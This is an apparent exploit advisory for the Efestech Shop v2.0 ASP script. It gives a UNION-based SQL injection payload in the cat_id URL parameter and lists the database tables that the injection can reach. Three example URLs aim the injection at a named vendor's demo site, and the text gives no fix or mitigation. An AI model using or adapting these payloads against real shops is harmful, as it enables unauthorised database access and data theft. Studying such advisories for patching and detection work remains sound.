efestechshop-sql.txt

`Title: Efestech Shop v2.0 Sql İnjection Vuln  
  
==============================  
==================================  
  
[+] Author : Dr.Kacak  
[+] Special Thankz : KnockOut And All My Friends  
[+] System 0VerfL0WerZ Group & BuqX Team  
[+] Mail : BuqX [at] Hotmail [dot] com  
  
=================================================================  
  
Script : Efestech Shop v2.0  
Verz: 2.0  
Download : http://www.aspindir.com/indir/5479  
  
  
  
SQL attack ;  
  
http://target.com/path/?cmd=urunler&cat_id=30+union+select+0+from+ayarlar  
  
Tables;  
  
ayarlar  
cat_eng  
cat_tr  
eng  
lisans  
mark_eng  
mark_tr  
product  
subcat_eng  
subcat_tr  
tr  
urun_resim  
  
  
  
###############################################################  
  
Example Bug Site :  
  
http://www.efestech.com/demo/shop/?cmd=urunler&cat_id=30+union+select+0+from+ayarlar  
http://www.efestech.com/demo/shop/?cmd=urunler&cat_id=30+union+select+0+from+eng  
http://www.efestech.com/demo/shop/?cmd=urunler&cat_id=30+union+select+0+from+tr  
  
  
`